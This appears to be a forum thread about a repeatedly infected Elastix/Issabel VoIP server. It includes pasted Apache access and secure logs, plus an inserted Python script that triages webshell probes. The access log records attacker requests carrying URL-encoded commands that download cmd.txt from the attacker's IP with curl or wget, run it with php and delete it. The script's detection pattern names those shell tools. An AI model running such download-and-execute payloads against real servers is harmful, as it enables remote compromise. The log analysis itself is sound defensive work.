    51.15.12.13 - - [10/Jun/2017:04:55:59 -0400] "POST /vtigercrm/Hima.php HTTP/1.1" 404 216
    51.15.12.13 - - [10/Jun/2017:04:56:00 -0400] "POST /vtigercrm/xXx-mat.php HTTP/1.1" 404 219
    51.15.12.13 - - [10/Jun/2017:04:56:00 -0400] "POST /vtigercrm/Himaa.php HTTP/1.1" 404 217
    51.15.12.13 - - [10/Jun/2017:04:56:01 -0400] "POST /recordings/3Zz.php HTTP/1.1" 403 220
    51.15.12.13 - - [10/Jun/2017:04:56:01 -0400] "POST /vtigercrm/3Zz.php HTTP/1.1" 404 215
    51.15.12.13 - - [10/Jun/2017:04:56:02 -0400] "POST /vtigercrm/zizo.php HTTP/1.1" 404 216
    51.15.12.13 - - [10/Jun/2017:04:56:02 -0400] "POST /vtigercrm/ops.php HTTP/1.1" 404 215
    51.15.12.13 - - [10/Jun/2017:04:56:03 -0400] "POST /vtigercrm/xXx-ELMAYET-xXx.php HTTP/1.1" 404 227
    51.15.12.13 - - [10/Jun/2017:04:56:03 -0400] "POST /zz.php.call HTTP/1.1" 404 209
    51.15.12.13 - - [10/Jun/2017:04:56:04 -0400] "POST /vtigercrm/z.php?pass=angel HTTP/1.1" 404 213
    51.15.12.13 - - [10/Jun/2017:04:56:04 -0400] "POST /z.php?pass=angel HTTP/1.1" 404 203
    51.15.12.13 - - [10/Jun/2017:04:56:05 -0400] "POST /recordings/lol.php HTTP/1.1" 403 220
    51.15.12.13 - - [10/Jun/2017:04:56:05 -0400] "POST /recordings/badr2.php HTTP/1.1" 403 222
    51.15.12.13 - - [10/Jun/2017:04:56:06 -0400] "POST /recordings/Go.php HTTP/1.1" 403 219
    51.15.12.13 - - [10/Jun/2017:04:56:06 -0400] "POST /recordings/info.php HTTP/1.1" 403 221
    51.15.12.13 - - [10/Jun/2017:04:56:07 -0400] "POST /recordings/11.php HTTP/1.1" 403 219
    51.15.12.13 - - [10/Jun/2017:04:56:07 -0400] "POST /vtigercrm/moaz.php HTTP/1.1" 404 216
    51.15.12.13 - - [10/Jun/2017:04:56:08 -0400] "POST /vtigercrm/11.php HTTP/1.1" 404 214
    51.15.12.13 - - [10/Jun/2017:04:56:08 -0400] "POST /11.php HTTP/1.1" 404 204
    51.15.12.13 - - [10/Jun/2017:04:56:09 -0400] "POST /recordings/a8a.php HTTP/1.1" 403 220
    51.15.12.13 - - [10/Jun/2017:04:56:09 -0400] "POST /wav.php HTTP/1.1" 404 205
    51.15.12.13 - - [10/Jun/2017:04:56:10 -0400] "POST /_asterisk/V-E-M.php?268e31510577740=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 404 217
    51.15.12.13 - - [10/Jun/2017:04:56:10 -0400] "POST /x1.php HTTP/1.1" 404 204
    51.15.12.13 - - [10/Jun/2017:04:56:11 -0400] "POST /recordings/webadmin.php HTTP/1.1" 403 225
    51.15.12.13 - - [10/Jun/2017:04:56:11 -0400] "POST /panel/webadmin.php HTTP/1.1" 404 216
    51.15.12.13 - - [10/Jun/2017:04:56:12 -0400] "POST /webadmin.php HTTP/1.1" 404 210
    51.15.12.13 - - [10/Jun/2017:04:56:12 -0400] "POST /panel/main.php HTTP/1.1" 404 212
    51.15.12.13 - - [10/Jun/2017:04:56:13 -0400] "POST /panel/main.php?act=cmd HTTP/1.1" 404 212
    51.15.12.13 - - [10/Jun/2017:04:56:13 -0400] "POST /panel/main.php.1 HTTP/1.1" 404 214
    51.15.12.13 - - [10/Jun/2017:04:56:13 -0400] "POST /panel/main.php.1?act=cmd HTTP/1.1" 404 214
    51.15.12.13 - - [10/Jun/2017:04:56:13 -0400] "POST /panel/main.php.2 HTTP/1.1" 404 214
    51.15.12.13 - - [10/Jun/2017:04:56:14 -0400] "POST /panel/main.php.2?act=cmd HTTP/1.1" 404 214
    51.15.12.13 - - [10/Jun/2017:04:56:14 -0400] "POST /recordings/main.php HTTP/1.1" 403 221
    51.15.12.13 - - [10/Jun/2017:04:56:14 -0400] "POST /recordings/main.php?act=cmd HTTP/1.1" 403 221
    51.15.12.13 - - [10/Jun/2017:04:56:14 -0400] "POST /recordings/main.php.1 HTTP/1.1" 403 223
    51.15.12.13 - - [10/Jun/2017:04:56:15 -0400] "POST /recordings/main.php.1?act=cmd HTTP/1.1" 403 223
    51.15.12.13 - - [10/Jun/2017:04:56:15 -0400] "POST /recordings/main.php.2 HTTP/1.1" 403 223
    51.15.12.13 - - [10/Jun/2017:04:56:16 -0400] "POST /recordings/main.php.2?act=cmd HTTP/1.1" 403 223
    51.15.12.13 - - [10/Jun/2017:04:56:16 -0400] "POST /main.php HTTP/1.1" 404 206
    51.15.12.13 - - [10/Jun/2017:04:56:16 -0400] "POST /main.php?act=cmd HTTP/1.1" 404 206
    51.15.12.13 - - [10/Jun/2017:04:56:16 -0400] "POST /vtigercrm/main.php HTTP/1.1" 404 216
    51.15.12.13 - - [10/Jun/2017:04:56:17 -0400] "POST /vtigercrm/main.php?act=cmd HTTP/1.1" 404 216
    51.15.12.13 - - [10/Jun/2017:04:56:17 -0400] "POST /config.all.php HTTP/1.1" 404 212
    51.15.12.13 - - [10/Jun/2017:04:56:17 -0400] "POST /recordings/config.all.php HTTP/1.1" 403 227
    51.15.12.13 - - [10/Jun/2017:04:56:18 -0400] "POST /panel/config.all.php HTTP/1.1" 404 218
    51.15.12.13 - - [10/Jun/2017:04:56:18 -0400] "POST /vtigercrm/config.all.php HTTP/1.1" 404 222
    51.15.12.13 - - [10/Jun/2017:04:56:19 -0400] "POST /admin/config.all.php HTTP/1.1" 404 218
    51.15.12.13 - - [10/Jun/2017:04:56:19 -0400] "POST /0x4148.php.call HTTP/1.1" 404 213
    51.15.12.13 - - [10/Jun/2017:04:56:20 -0400] "POST /recordings/misc/?cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 218
    51.15.12.13 - - [10/Jun/2017:04:56:20 -0400] "POST /graph.php?module=upload HTTP/1.1" 404 207
    51.15.12.13 - - [10/Jun/2017:04:56:21 -0400] "POST /recordings/graph.php?module=upload HTTP/1.1" 403 222
    51.15.12.13 - - [10/Jun/2017:04:56:21 -0400] "POST /vtigercrm/graph.php?module=upload HTTP/1.1" 404 217
    51.15.12.13 - - [10/Jun/2017:04:56:22 -0400] "POST /vtigercrm/phpversions.php?module=upload HTTP/1.1" 404 223
    51.15.12.13 - - [10/Jun/2017:04:56:22 -0400] "POST /recordings/phpversions.php?module=upload HTTP/1.1" 403 228
    51.15.12.13 - - [10/Jun/2017:04:56:23 -0400] "POST /phpversions.php?module=upload HTTP/1.1" 404 213
    216.218.206.66 - - [10/Jun/2017:06:00:25 -0400] "GET / HTTP/1.1" 200 5409
    216.218.206.66 - - [10/Jun/2017:06:01:06 -0400] "GET / HTTP/1.1" 200 5409
    183.129.160.229 - - [10/Jun/2017:06:21:05 -0400] "GET / HTTP/1.1" 200 5409
    163.172.69.33 - - [10/Jun/2017:09:28:26 -0400] "GET / HTTP/1.0" 400 362
    163.172.69.33 - - [10/Jun/2017:09:28:28 -0400] "GET /recordings//theme/main.css HTTP/1.1" 200 184
    163.172.69.33 - - [10/Jun/2017:09:30:18 -0400] "POST /recordings/index.php HTTP/1.1" 500 -
    163.172.69.33 - - [10/Jun/2017:09:30:20 -0400] "GET /recordings/misc/audio.php HTTP/1.1" 200 -
    98.242.248.14 - - [10/Jun/2017:09:45:25 -0400] "GET / HTTP/1.1" 500 -
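
Added example (not part of the original posts and not Elastix/Issabel code): a triage pass over an access log like the one above that separates blocked webshell probing (POST to `.php` paths answered 403/404) from payload-bearing requests that received a 2xx and need a check on disk. The sample lines, addresses and the `up.php` name are constructed; the token list and the probe threshold are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample in the same Apache log shape as the posted log.
# Addresses come from the documentation ranges; the payload is shortened.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Jun/2017:04:55:41 -0400] "GET /recordings/index.php HTTP/1.1" 500 -
198.51.100.7 - - [10/Jun/2017:04:55:54 -0400] "POST /recordings/cmd.php?pass=x&cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F198.51.100.7%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out HTTP/1.1" 403 220
198.51.100.7 - - [10/Jun/2017:04:56:05 -0400] "POST /recordings/lol.php HTTP/1.1" 403 220
198.51.100.7 - - [10/Jun/2017:04:56:08 -0400] "POST /11.php HTTP/1.1" 404 204
198.51.100.7 - - [10/Jun/2017:04:56:09 -0400] "POST /wav.php HTTP/1.1" 404 205
203.0.113.9 - - [10/Jun/2017:09:30:20 -0400] "POST /recordings/misc/up.php?cmd=uname+-a HTTP/1.1" 200 57
192.0.2.44 - - [10/Jun/2017:23:15:35 -0400] "GET /index.php?menu=dashboard&rawmode=yes HTTP/1.1" 200 7518
this line is not an access-log record
"""

# Works for both common and combined format: anything after the size is ignored.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.*?) HTTP/[\d.]+" (?P<status>\d{3}) \S+'
)
# Assumed token list: shell utilities and paths seen in download-and-run payloads.
SHELL_TOKENS = re.compile(r"\b(?:curl|wget|uname|php)\s|/tmp/|\|\|")
# Matches x.php as well as x.php.1 / x.php.call style names.
PHP_PATH = re.compile(r"\.php(?:\.\w+)?$", re.IGNORECASE)


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    path, _, query = m["target"].partition("?")
    return {
        "ip": m["ip"],
        "ts": m["ts"],
        "method": m["method"],
        "path": path,
        "query": unquote_plus(query),  # decode %3B, + and friends before matching
        "status": int(m["status"]),
    }


def triage(log_text, probe_threshold=3):
    """Group suspicious requests per client and assign a verdict.

    "scanner"     : payloads or many POSTs to PHP paths, all answered 403/404.
    "investigate" : a payload-bearing request got a 2xx, so the target exists
                    and answered; confirm on disk whether the file is legitimate.
    """
    per_ip = defaultdict(lambda: {"missing_php": set(), "injections": 0, "answered": []})
    unparsed = 0
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        if rec is None:
            unparsed += 1
            continue
        injected = bool(SHELL_TOKENS.search(rec["query"]))
        missing = (
            rec["method"] == "POST"
            and rec["status"] in (403, 404)
            and bool(PHP_PATH.search(rec["path"]))
        )
        if not (injected or missing):
            continue
        entry = per_ip[rec["ip"]]
        if missing:
            entry["missing_php"].add(rec["path"])
        if injected:
            entry["injections"] += 1
            if 200 <= rec["status"] < 300:
                entry["answered"].append((rec["ts"], rec["path"]))

    findings = {}
    for ip, e in per_ip.items():
        if e["answered"]:
            verdict = "investigate"
        elif e["injections"] or len(e["missing_php"]) >= probe_threshold:
            verdict = "scanner"
        else:
            continue
        findings[ip] = {
            "verdict": verdict,
            "missing_php": len(e["missing_php"]),
            "injections": e["injections"],
            "answered": e["answered"],
        }
    return findings, unparsed


if __name__ == "__main__":
    results, skipped = triage(SAMPLE_LOG)
    for ip, info in results.items():
        print(ip, info)
    print("unparsed lines:", skipped)
```

A 2xx on a payload-bearing request does not prove the command ran, since some applications answer 200 for any path; it only ranks that request first for a check of the file on disk.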

      navaismo I did a recursive search for that file and it is only found in /tmp and /var/www/html/_asterisk.

      I delete them over and over but they come back...

      I see strange POST commands in the access and ssl_access logs, which I have already shared with you.

      navaismo This is my /var/log/secure log for June 9th:

      Jun 9 00:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 00:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 00:10:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 00:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 00:20:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 00:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 00:30:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 00:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 00:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 00:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 00:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 00:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 01:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 01:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 01:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 01:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 01:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 01:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 01:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 01:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 01:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 01:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 01:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 01:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 02:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 02:05:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 02:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 02:15:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 02:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 02:25:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 02:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 02:35:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 02:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 02:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 02:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 02:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 03:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 03:05:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 03:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 03:15:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 03:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 03:25:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 03:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 03:35:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 03:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 03:45:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 03:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 03:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 04:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 04:02:01 voicesrv01 runuser: pam_unix(runuser-l:session): session opened for user cyrus by (uid=0)
      Jun 9 04:02:01 voicesrv01 runuser: pam_unix(runuser-l:session): session closed for user cyrus
      Jun 9 04:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 04:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 04:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 04:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 04:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 04:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 04:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 04:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 04:45:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 04:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 04:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 05:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 05:05:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 05:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 05:15:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 05:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 05:25:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 05:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 05:35:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 05:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 05:45:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 05:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 05:55:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 06:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 06:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 06:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 06:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 06:20:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 06:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 06:30:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 06:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 06:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 06:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 06:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 06:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 07:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 07:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 07:10:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 07:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 07:20:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 07:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 07:30:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 07:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 07:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 07:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 07:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 07:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 08:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 08:05:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 08:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 08:15:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 08:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 08:25:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 08:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 08:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 08:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 08:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 08:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 08:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
